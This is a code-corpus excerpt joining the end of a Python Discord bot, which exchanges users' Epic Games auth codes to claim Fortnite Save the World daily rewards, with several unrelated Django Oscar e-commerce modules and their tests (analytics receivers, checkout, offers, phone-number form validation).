value='This will show you how to use the bot.\n\n'
'To get started, [Visit this link](https://tinyurl.com/epicauthcode), and copy **only** the '
'authorisation code that it gives you. **(not the code from the URL)**.'
'\nIf you are already signed into Epic Games on your browser, you can just '
'[refresh the final page](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)'
' to get a new code\n\nFor example,\n```js'
'\n{"redirectUrl":"https://accounts.epicgames.com/fnauth?code=a51c1f4d35b14'
'57c8e34a1f6026faa35","sid":null}\n```\nwill become\n```\n'
'a51c1f4d35b1457c8e34a1f6026faa35\n```\n\nThen, just simply copy paste that into '
f'your command, like so:\n``{examples.get(arg)}``\n:bulb: '
'Pro tip: In most browsers, double click on or below the code and it should '
'highlight just the code\n\nIf you need help, [join the server](https://discord.gg/MtSgUu).'
' Don\'t be afraid to ask!',
inline=False)
embed.add_field(name='Important Disclaimers',
value='AFAIK, your auth code can be used maliciously, if you are sceptical,'
' [read the source code](https://github.com/dippyshere/stw-daily), or check out '
'<#771902446737162240> over in [STW Dailies](https://discord.gg/MtSgUu)',
inline=False)
await message.send(embed=embed)
@client.command(name='ins',
aliases=mixedCase('instruction') + ['detailed', 'instruct', 'what', 'inst'],
description='Detailed instructions to get auth token and claim daily')
async def instruction(ctx):
await instruction_command(ctx, 'norm')
@slash.slash(name='Instruction',
description='Detailed instructions to get auth token and claim daily',
guild_ids=guild_ids)
async def slashinstruction(ctx):
await instruction_command(ctx, 'slash')
# noinspection SpellCheckingInspection,PyShadowingNames
async def ping_command(message):
websocket_ping = '{0}'.format(int(client.latency * 100)) + ' ms'
before = time.monotonic()
# msg = await message.send("Pong!")
# await msg.edit(content=f"Pong! `{int(ping)}ms`")
# await message.send(f'websocket latency: {client.latency*100}ms')
# await message.send('websocket: {0}'.format(int(client.latency * 100)) + ' ms')
embed = discord.Embed(title='Latency', color=discord.Color.blurple())
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
embed.add_field(name='Websocket :electric_plug:', value=websocket_ping, inline=True)
embed.add_field(name='Actual :microphone:',
value='<a:loadin:759293511475527760>', inline=True)
# embed.add_field(name='Uptime :alarm_clock:', value=f'{get_bot_uptime()}', inline=True)
embed2 = discord.Embed(title='Latency', color=discord.Color.blurple())
embed2.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
embed2.add_field(name='Websocket :electric_plug:', value=websocket_ping, inline=True)
msg = await message.send(embed=embed)
ping = (time.monotonic() - before) * 1000
embed2.add_field(name='Actual :microphone:',
value=f'{int(ping)}ms', inline=True)
await asyncio.sleep(4)
# embed2.add_field(name='Uptime :alarm_clock:', value=f'{get_bot_uptime()}', inline=True)
await msg.edit(embed=embed2)
@client.command(name='pin',
aliases=mixedCase('ping') + ['pong', 'latency'],
description='Send websocket ping and embed edit latency')
async def ping(ctx):
await ping_command(ctx)
@slash.slash(name='ping',
description='Send websocket ping and embed edit latency',
guild_ids=guild_ids)
async def slashping(ctx):
await ctx.defer()
await ping_command(ctx)
async def invite_command(ctx):
await ctx.send('Support server: https://discord.gg/Mt7SgUu\nBot invite: https://tinyurl.com/stwdailyinvite')
@client.command(name='in',
aliases=mixedCase('invite') + ['inv', 'INV', 'iNV', 'add', 'server', 'link'],
description='If you need help, want to report a problem, or just want somewhere to use the bot.')
async def invite(ctx):
await invite_command(ctx)
@slash.slash(name='invite',
description='If you need help, want to report a problem, or just want somewhere to use the bot.',
guild_ids=guild_ids)
async def slashinvite(ctx):
await ctx.send('Support server: https://discord.gg/Mt7SgUu\nBot invite: <https://tinyurl.com/stwdailyinvite>')
# noinspection PyUnboundLocalVariable,PyUnusedLocal,PyBroadException
async def daily_command(message, token=''):
global amount2, rewards
print(f'daily requested by: {message.author.name}')
global daily_feedback, r
daily_feedback = ""
r = ''
if token == "":
embed = discord.Embed(title="No auth code", description='', colour=discord.Color.red())
embed.add_field(name='You can get it from:',
value='[Here if you **ARE NOT** signed into Epic Games on your browser](https://www.epicgames.com/id/logout?redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin%3FredirectUrl%3Dhttps%253A%252F%252Fwww.epicgames.com%252Fid%252Fapi%252Fredirect%253FclientId%253Dec684b8c687f479fadea3cb2ad83f5c6%2526responseType%253Dcode)\n[Here if you **ARE** signed into Epic Games on your browser](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name='Need help? Run ``stw instruction``',
value='Or [Join the support server](https://discord.gg/Mt7SgUu).', inline=True)
embed.add_field(name='Note: You need a new code __every day__.',
value='Thank you for using my bot ❤', inline=True)
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}",
icon_url=message.author.avatar_url)
await message.send(embed=embed)
elif len(token) != 32:
embed = discord.Embed(title="Incorrect formatting", description='', colour=discord.Color.red())
embed.add_field(name='It should be 32 characters long, and only contain numbers and letters',
value='Check if you have any stray quotation marks')
embed.add_field(name='An Example:',
value='a51c1f4d35b1457c8e34a1f6026faa35')
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
await message.send(embed=embed)
else:
embed = discord.Embed(title="Logging in and processing <a:loadin:759293511475527760>",
description='This shouldn\'t take long...', colour=discord.Color.green())
embed.set_footer(text=f"Requested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
msg = await message.send(embed=embed)
gtResult = getToken(token)
if not gtResult[0]:
# print(str(gtResult))
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
else:
h = {
"Authorization": f"bearer {gtResult[0]}",
"Content-Type": "application/json"
}
r = requests.post(endpoints.reward.format(gtResult[1]), headers=h, data="{}")
# await msg.edit(embed=discord.Embed(title='Claimed your daily.'))
try:
if str(r.text).find('{"errorCode":"') == '-1':
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
else:
try:
# print(str(str(r.text).split("notifications", 1)[1][2:].split('],"profile', 1)[0]))
daily_feedback = str(r.text).split("notifications", 1)[1][4:].split('],"profile', 1)[0]
day = str(daily_feedback).split('"daysLoggedIn":', 1)[1].split(',"items":[', 1)[0]
try:
# await message.send(f'Debugging info because sometimes it breaks:\n{daily_feedback}')
item = str(daily_feedback).split('[{"itemType":"', 1)[1].split('","itemGuid"', 1)[0]
amount = str(daily_feedback).split('"quantity":', 1)[1].split("}]}", 1)[0]
embed = discord.Embed(title='Success',
colour=0x00c113)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803334198624336/Asset_2.1.14x2.png')
if "}" in amount:
amount2 = str(amount).split("},", 1)[0]
fndr_item = str(amount).split('itemType":"', 1)[1].split('","', 1)[0]
fndr_amount = str(amount).split('quantity":', 1)[1]
if fndr_item == 'CardPack:cardpack_event_founders':
fndr_item_f = "Founder's Llama"
elif fndr_item == 'CardPack:cardpack_bronze':
fndr_item_f = "Upgrade Llama (bronze)"
else:
fndr_item_f = fndr_item
embed.add_field(name=f'On day **{day}**, you received:', value=f"**{getReward(day)}**",
inline=False)
embed.add_field(name=f'Founders rewards:', value=f"**{fndr_amount}** **{fndr_item_f}**",
inline=False)
else:
embed.add_field(name=f'On day **{day}**, you received:', value=f"**{getReward(day)}**",
inline=False)
print('success')
print(item)
print(amount)
rewards = ''
for i in range(1, 7):
rewards += getReward(int(day) + i)
if not (i + 1 == 7):
rewards += ', '
else:
rewards += '.'
embed.add_field(name=f'Rewards for the next **7** days:', value=f'{rewards}', inline=False)
except Exception as e:
# await message.send(f'Debugging info because sometimes it breaks:\n{e}')
embed = discord.Embed(title=errorList[random.randint(0, 4)],
colour=0xeeaf00)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/757803329299415163/Asset_1.14x2.png')
embed.add_field(name='You already claimed today\'s reward.',
value=f"You are on day **{day}**", inline=False)
embed.add_field(name='Today\'s reward was:',
value=f"{getReward(day)}", inline=False)
print('Daily was already claimed or i screwed up')
print(f'Error info: {e}')
except:
errorType = str(gtResult[1])
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_found':
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code is invalid',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='Your code is expired, or of the wrong type\n(e.g. from url instead of page body)',
inline=False)
embed.add_field(name="How to fix:",
value='[Refresh the page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)',
inline=False)
embed.add_field(name="What it should look like:",
value='32 characters of only numbers and letters.\ne.g. a51c1f4d35b1457c8e34a1f6026faa35',
inline=False)
if errorType == 'errors.com.epicgames.account.oauth.authorization_code_not_for_your_client':
# invalid grant error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='Your authorisation code was created with the wrong link',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="Why this happens:",
value='You used a different link to get your token',
inline=False)
embed.add_field(name="How to fix:",
value='[Use this page to get a new code](https://www.epicgames.com/id/api/redirect?clientId=ec684b8c687f479fadea3cb2ad83f5c6&responseType=code)\n[Join the support server for further help](https://discord.gg/mt7sguu)',
inline=False)
if len(errorType) == 32:
# login error
embed = discord.Embed(
title=errorList[random.randint(0, 4)],
description='You don\'t have Save the World',
colour=0xf63a32
)
embed.set_thumbnail(
url='https://cdn.discordapp.com/attachments/448073494660644884/758129079064068096/Asset_4.14x2.png')
embed.add_field(name="You need STW for STW Daily rewards",
value='This may appear if you signed into the wrong account. '
'Try to use incognito and [use this page to get a new code](https://tinyurl.com/epicauthcode)',
inline=False)
print(f'error: {gtResult[1]}')
except:
pass
# embed.set_author(name=str(message.message.content)[9:],
# icon_url='https://upload.wikimedia.org/wikipedia/commons/thumb/3/31'
# '/Epic_Games_logo.svg/1200px-Epic_Games_logo.svg.png')
embed.set_footer(text=f"\nRequested by: {message.author.name} • "
f"{time.strftime('%H:%M')} {datetime.date.today().strftime('%d/%m/%Y')}"
, icon_url=message.author.avatar_url)
# await message.send(embed=embed)
await asyncio.sleep(0.5)
await msg.edit(embed=embed)
@client.command(name='d',
aliases=mixedCase('daily') + ['collect', 'dailt', 'daliy', 'dail', 'daiyl', 'day', 'dialy', 'da', 'dly', 'login', 'claim'],
description='Claim your daily reward')
async def daily(ctx, token=''):
await daily_command(ctx, token)
@slash.slash(name='daily',
description='Claim your daily reward',
options=[
create_option(name="token",
description="The auth code for your daily. "
"You can one by sending the command without token.",
option_type=3,
required=False),
], guild_ids=guild_ids
)
async def slashdaily(ctx, token=''):
await daily_command(ctx, token)
# noinspection SpellCheckingInspection
client.loop.create_task(update_status())
client.run('token')
```
|
{
"source": "Jean1508/ya-madoa",
"score": 2
}
|
#### File: apps/analytics/receivers.py
```python
import logging
from django.db import IntegrityError
from django.db.models import F
from django.dispatch import receiver
from oscar.apps.basket.signals import basket_addition
from oscar.apps.catalogue.signals import product_viewed
from oscar.apps.order.signals import order_placed
from oscar.apps.search.signals import user_search
from oscar.core.loading import get_model
ProductRecord = get_model('analytics', 'ProductRecord')
UserProductView = get_model('analytics', 'UserProductView')
UserRecord = get_model('analytics', 'UserRecord')
UserSearch = get_model('analytics', 'UserSearch')
# Helpers
logger = logging.getLogger('oscar.analytics')
def _update_counter(model, field_name, filter_kwargs, increment=1):
"""
Efficiently updates a counter field by a given increment. Uses Django's
update() call to fetch and update in one query.
TODO: This has a race condition, we should use UPSERT here
:param model: The model class of the recording model
:param field_name: The name of the field to update
:param filter_kwargs: Parameters to the ORM's filter() function to get the
correct instance
"""
try:
record = model.objects.filter(**filter_kwargs)
affected = record.update(**{field_name: F(field_name) + increment})
if not affected:
filter_kwargs[field_name] = increment
model.objects.create(**filter_kwargs)
except IntegrityError: # pragma: no cover
# get_or_create has a race condition (we should use upsert in supported)
# databases. For now just ignore these errors
logger.error(
"IntegrityError when updating analytics counter for %s", model)
def _record_products_in_order(order):
# surely there's a way to do this without causing a query for each line?
for line in order.lines.all():
_update_counter(
ProductRecord, 'num_purchases',
{'product': line.product}, line.quantity)
def _record_user_order(user, order):
try:
record = UserRecord.objects.filter(user=user)
affected = record.update(
num_orders=F('num_orders') + 1,
num_order_lines=F('num_order_lines') + order.num_lines,
num_order_items=F('num_order_items') + order.num_items,
total_spent=F('total_spent') + order.total_incl_tax,
date_last_order=order.date_placed)
if not affected:
UserRecord.objects.create(
user=user, num_orders=1, num_order_lines=order.num_lines,
num_order_items=order.num_items,
total_spent=order.total_incl_tax,
date_last_order=order.date_placed)
except IntegrityError: # pragma: no cover
logger.error(
"IntegrityError in analytics when recording a user order.")
# Receivers
@receiver(product_viewed)
def receive_product_view(sender, product, user, **kwargs):
if kwargs.get('raw', False):
return
_update_counter(ProductRecord, 'num_views', {'product': product})
if user and user.is_authenticated:
_update_counter(UserRecord, 'num_product_views', {'user': user})
UserProductView.objects.create(product=product, user=user)
@receiver(user_search)
def receive_product_search(sender, query, user, **kwargs):
if user and user.is_authenticated and not kwargs.get('raw', False):
UserSearch._default_manager.create(user=user, query=query)
@receiver(basket_addition)
def receive_basket_addition(sender, product, user, **kwargs):
if kwargs.get('raw', False):
return
_update_counter(
ProductRecord, 'num_basket_additions', {'product': product})
if user and user.is_authenticated:
_update_counter(UserRecord, 'num_basket_additions', {'user': user})
@receiver(order_placed)
def receive_order_placed(sender, order, user, **kwargs):
if kwargs.get('raw', False):
return
_record_products_in_order(order)
if user and user.is_authenticated:
_record_user_order(user, order)
```
#### File: apps/checkout/applicator.py
```python
class SurchargeList(list):
@property
def total(self):
return sum([surcharge.price for surcharge in self])
class SurchargePrice():
surcharge = None
price = None
def __init__(self, surcharge, price):
self.surcharge = surcharge
self.price = price
class SurchargeApplicator():
def __init__(self, request=None, context=None):
self.context = context
self.request = request
def get_surcharges(self, basket, **kwargs):
"""
For example::
return (
PercentageCharge(percentage=D("2.00")),
FlatCharge(excl_tax=D("20.0"), incl_tax=D("20.0")),
)
Surcharges must implement the minimal API in ``oscar.apps.checkout.surcharges.BaseSurcharge``.
Note that you can also make it a model if you want, just like shipping methods.
"""
return ()
def get_applicable_surcharges(self, basket, **kwargs):
methods = [
SurchargePrice(
surcharge,
surcharge.calculate(basket=basket, **kwargs)
)
for surcharge in self.get_surcharges(basket=basket, **kwargs)
if self.is_applicable(surcharge=surcharge, basket=basket, **kwargs)
]
if methods:
return SurchargeList(methods)
else:
return None
def is_applicable(self, surcharge, basket, **kwargs):
"""
Checks if surcharge is applicable to certain conditions
"""
return True
```
#### File: apps/checkout/apps.py
```python
from django.conf import settings
from django.conf.urls import url
from django.contrib.auth.decorators import login_required
from django.utils.translation import gettext_lazy as _
from oscar.core.application import OscarConfig
from oscar.core.loading import get_class
class CheckoutConfig(OscarConfig):
label = 'checkout'
name = 'oscar.apps.checkout'
verbose_name = _('Checkout')
namespace = 'checkout'
def ready(self):
self.index_view = get_class('checkout.views', 'IndexView')
self.shipping_address_view = get_class('checkout.views', 'ShippingAddressView')
self.user_address_update_view = get_class('checkout.views',
'UserAddressUpdateView')
self.user_address_delete_view = get_class('checkout.views',
'UserAddressDeleteView')
self.shipping_method_view = get_class('checkout.views', 'ShippingMethodView')
self.payment_method_view = get_class('checkout.views', 'PaymentMethodView')
self.payment_details_view = get_class('checkout.views', 'PaymentDetailsView')
self.thankyou_view = get_class('checkout.views', 'ThankYouView')
def get_urls(self):
urls = [
url(r'^$', self.index_view.as_view(), name='index'),
# Shipping/user address views
url(r'shipping-address/$',
self.shipping_address_view.as_view(), name='shipping-address'),
url(r'user-address/edit/(?P<pk>\d+)/$',
self.user_address_update_view.as_view(),
name='user-address-update'),
url(r'user-address/delete/(?P<pk>\d+)/$',
self.user_address_delete_view.as_view(),
name='user-address-delete'),
# Shipping method views
url(r'shipping-method/$',
self.shipping_method_view.as_view(), name='shipping-method'),
# Payment views
url(r'payment-method/$',
self.payment_method_view.as_view(), name='payment-method'),
url(r'payment-details/$',
self.payment_details_view.as_view(), name='payment-details'),
# Preview and thankyou
url(r'preview/$',
self.payment_details_view.as_view(preview=True),
name='preview'),
url(r'thank-you/$', self.thankyou_view.as_view(),
name='thank-you'),
]
return self.post_process_urls(urls)
def get_url_decorator(self, pattern):
if not settings.OSCAR_ALLOW_ANON_CHECKOUT:
return login_required
if pattern.name.startswith('user-address'):
return login_required
return None
```
#### File: apps/offer/managers.py
```python
from django.db import models
from django.utils.timezone import now
from .queryset import RangeQuerySet
class ActiveOfferManager(models.Manager):
"""
For searching/creating offers within their date range
"""
def get_queryset(self):
cutoff = now()
return super().get_queryset().filter(
models.Q(end_datetime__gte=cutoff) | models.Q(end_datetime=None),
models.Q(start_datetime__lte=cutoff) | models.Q(start_datetime=None),
).filter(status=self.model.OPEN)
RangeManager = models.Manager.from_queryset(RangeQuerySet, "RangeManager")
class BrowsableRangeManager(RangeManager):
"""
For searching only ranges which have the "is_public" flag set to True.
"""
def get_queryset(self):
return super().get_queryset().filter(
is_public=True)
```
#### File: oscar/forms/mixins.py
```python
import phonenumbers
from django import forms
from django.core import validators
from django.utils.translation import gettext_lazy as _
from phonenumber_field.phonenumber import PhoneNumber
class PhoneNumberMixin(object):
"""Validation mixin for forms with a phone numbers, and optionally a country.
It tries to validate the phone numbers, and on failure tries to validate
them using a hint (the country provided), and treating it as a local number.
Specify which fields to treat as phone numbers by specifying them in
`phone_number_fields`, a dictionary of fields names and default kwargs
for instantiation of the field.
"""
country = None
region_code = None
# Since this mixin will be used with `ModelForms`, names of phone number
# fields should match names of the related Model field
phone_number_fields = {
'phone_number': {
'required': False,
'help_text': '',
'max_length': 32,
'label': _('Phone number')
},
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# We can't use the PhoneNumberField here since we want validate the
# phonenumber based on the selected country as a fallback when a local
# number is entered. We add the fields in the init since on Python 2
# using forms.Form as base class results in errors when using this
# class as mixin.
# If the model field already exists, copy existing properties from it
for field_name, field_kwargs in self.phone_number_fields.items():
for key in field_kwargs:
try:
field_kwargs[key] = getattr(self.fields[field_name], key)
except (KeyError, AttributeError):
pass
self.fields[field_name] = forms.CharField(**field_kwargs)
def get_country(self):
# If the form data contains valid country information, we use that.
if hasattr(self, 'cleaned_data') and 'country' in self.cleaned_data:
return self.cleaned_data['country']
# Oscar hides the field if there's only one country. Then (and only
# then!) we can consider a country on the model instance.
elif 'country' not in self.fields and hasattr(self.instance, 'country'):
return self.instance.country
def set_country_and_region_code(self):
# Try hinting with the shipping country if we can determine one.
self.country = self.get_country()
if self.country:
self.region_code = self.country.iso_3166_1_a2
def clean_phone_number_field(self, field_name):
number = self.cleaned_data.get(field_name)
# Empty
if number in validators.EMPTY_VALUES:
return ''
# Check for an international phone format
try:
phone_number = PhoneNumber.from_string(number)
except phonenumbers.NumberParseException:
if not self.region_code:
# There is no shipping country, not a valid international number
self.add_error(
field_name,
_('This is not a valid international phone format.'))
return number
# The PhoneNumber class does not allow specifying
# the region. So we drop down to the underlying phonenumbers
# library, which luckily allows parsing into a PhoneNumber
# instance.
try:
phone_number = PhoneNumber.from_string(number,
region=self.region_code)
if not phone_number.is_valid():
self.add_error(
field_name,
_('This is not a valid local phone format for %s.')
% self.country)
except phonenumbers.NumberParseException:
# Not a valid local or international phone number
self.add_error(
field_name,
_('This is not a valid local or international phone format.'))
return number
return phone_number
def clean(self):
self.set_country_and_region_code()
cleaned_data = super().clean()
for field_name in self.phone_number_fields:
cleaned_data[field_name] = self.clean_phone_number_field(field_name)
return cleaned_data
```
#### File: functional/checkout/test_session.py
```python
from django.urls import reverse
from oscar.test import testcases
from . import CheckoutMixin
class TestCheckoutOfDigitalGoods(CheckoutMixin, testcases.WebTestCase):
def setUp(self):
super().setUp()
product = self.create_digital_product()
self.add_product_to_basket(product)
def test_buying_a_digital_good_doesnt_error(self):
payment_details_page = self.get(
reverse('checkout:index')).maybe_follow()
preview_page = payment_details_page.click(linkid="view_preview")
response = preview_page.forms['place_order_form'].submit().follow()
self.assertIsOk(response)
```
#### File: functional/dashboard/test_shipping.py
```python
from decimal import Decimal as D
from django.urls import reverse
from oscar.apps.shipping import models
from oscar.test.testcases import WebTestCase
class TestShippingMethodDashboard(WebTestCase):
is_staff = True
def test_for_smoke(self):
list_page = self.get(reverse('dashboard:shipping-method-list'))
# Create a shipping method
create_page = list_page.click(linkid="create_new_shipping_method")
create_page.form['name'] = 'My method'
detail_page = create_page.form.submit().follow()
self.assertInContext(detail_page, 'method')
self.assertEqual(1, models.WeightBased.objects.all().count())
method = models.WeightBased.objects.all()[0]
# Edit shipping method
edit_page = detail_page.click(linkid="edit_method")
edit_page.form['name'] = 'My new method'
reloaded_detail_page = edit_page.form.submit().follow()
reloaded_method = models.WeightBased.objects.get(
id=method.id)
self.assertEqual("My new method", reloaded_method.name)
# Add a weight band
reloaded_detail_page.form['upper_limit'] = '0.1'
reloaded_detail_page.form['charge'] = '2.99'
reloaded_detail_page = reloaded_detail_page.form.submit().follow()
self.assertEqual(1, method.bands.all().count())
band = method.bands.all()[0]
# Edit weight band
edit_band_page = reloaded_detail_page.click(
linkid="edit_band_%s" % band.id)
edit_band_page.form['charge'] = '3.99'
reloaded_detail_page = edit_band_page.form.submit().follow()
reloaded_band = method.bands.get(id=band.id)
self.assertEqual(D('3.99'), reloaded_band.charge)
# Delete weight band
delete_band_page = reloaded_detail_page.click(
linkid="delete_band_%s" % reloaded_band.id)
reloaded_detail_page = delete_band_page.form.submit().follow()
self.assertEqual(0, method.bands.all().count())
# Delete shipping method
delete_page = reloaded_detail_page.click(linkid="delete_method")
delete_page.form.submit().follow()
self.assertEqual(0, models.WeightBased.objects.all().count())
```
#### File: functional/order/test_emails.py
```python
import os
from django.core import mail
from django.test import TestCase
from oscar.core.loading import get_class
from oscar.test.factories import ProductImageFactory, create_order
from oscar.test.utils import EmailsMixin, remove_image_folders
OrderDispatcher = get_class('order.utils', 'OrderDispatcher')
class TestConcreteEmailsSending(EmailsMixin, TestCase):
def setUp(self):
super().setUp()
self.dispatcher = OrderDispatcher()
def test_send_order_placed_email_for_user(self):
order_number = 'SOME-NUM00042'
order = create_order(number=order_number, user=self.user)
extra_context = {
'order': order,
'lines': order.lines.all()
}
self.dispatcher.send_order_placed_email_for_user(order, extra_context)
self._test_common_part()
expected_subject = 'Confirmation of order {}'.format(order_number)
assert expected_subject == mail.outbox[0].subject
assert 'Your order contains:' in mail.outbox[0].body
product_title = order.lines.first().title
assert product_title in mail.outbox[0].body
def test_send_order_placed_email_with_attachments_for_user(self):
remove_image_folders()
order_number = 'SOME-NUM00042'
order = create_order(number=order_number, user=self.user)
extra_context = {
'order': order,
'lines': order.lines.all()
}
line = order.lines.first()
product_image = ProductImageFactory(product=line.product)
attachments = [
['fake_file.html', b'file_content', 'text/html'],
['fake_image.png', b'file_content', 'image/png'],
product_image.original.path, # To test sending file from `FileField` based field
]
self.dispatcher.send_order_placed_email_for_user(order, extra_context, attachments)
# All attachments were sent with email
assert len(mail.outbox[0].attachments) == 3
expected_attachments = ['fake_file.html', 'fake_image.png', 'test_image.jpg']
assert [attachment[0] for attachment in mail.outbox[0].attachments] == expected_attachments
# Remove test file
os.remove(product_image.original.path)
```
#### File: integration/address/test_forms.py
```python
from django.test import TestCase
from oscar.apps.address import forms, models
from oscar.test.factories import UserFactory
class TestUserAddressForm(TestCase):
def setUp(self):
self.user = UserFactory()
self.country = models.Country.objects.create(
iso_3166_1_a2='GB', name="UNITED KINGDOM")
def test_merges_addresses_with_same_hash(self):
data = {
'user': self.user,
'first_name': "Matus",
'last_name': "Moravcik",
'line1': "1 Egg Street",
'line4': "London",
'postcode': "N12 9RE",
'country': self.country}
# Create two addresses, which are slightly different
models.UserAddress.objects.create(**data)
other = data.copy()
other['first_name'] = 'Izidor'
duplicate = models.UserAddress.objects.create(**other)
# Edit duplicate to be same as original and check that the two
# addresses are merged when the form saves.
post_data = data.copy()
post_data['country'] = self.country.iso_3166_1_a2
form = forms.UserAddressForm(self.user, post_data, instance=duplicate)
self.assertFalse(form.is_valid())
self.assertTrue(len(form.errors['__all__']) > 0)
```
#### File: integration/communication/test_notification.py
```python
from django.test import TestCase
from oscar.apps.communication.models import Notification
from oscar.core.compat import get_user_model
from oscar.core.loading import get_class
from oscar.test.factories import UserFactory
User = get_user_model()
Dispatcher = get_class('communication.utils', 'Dispatcher')
class TestANewNotification(TestCase):
def setUp(self):
self.notification = Notification(
recipient=UserFactory(),
subject="Hello")
def test_is_in_a_users_inbox(self):
assert Notification.INBOX == self.notification.location
def test_is_not_read(self):
assert not self.notification.is_read
class TestANotification(TestCase):
def setUp(self):
self.notification = Notification.objects.create(
recipient=UserFactory(),
subject="Hello")
def test_can_be_archived(self):
self.notification.archive()
assert Notification.ARCHIVE == self.notification.location
class NotificationServiceTestCase(TestCase):
def test_notify_a_single_user(self):
user = UserFactory()
subj = "Hello you!"
body = "This is the notification body."
Dispatcher().notify_user(user, subj, body=body)
user_notification = Notification.objects.get(recipient=user)
assert user_notification.subject == subj
assert user_notification.body == body
def test_notify_a_set_of_users(self):
users = UserFactory.create_batch(3)
subj = "Hello everyone!"
body = "This is the notification body."
Dispatcher().notify_users(User.objects.all(), subj, body=body)
for user in users:
user_notification = Notification.objects.get(recipient=user)
assert user_notification.subject == subj
assert user_notification.body == body
```
#### File: integration/core/test_prices.py
```python
from decimal import Decimal as D
from itertools import product
from django.test import TestCase
from oscar.core.prices import Price
class TestPriceObject(TestCase):
def test_can_be_instantiated_with_tax_amount(self):
price = Price('USD', D('10.00'), tax=D('2.00'))
self.assertTrue(price.is_tax_known)
self.assertEqual(D('12.00'), price.incl_tax)
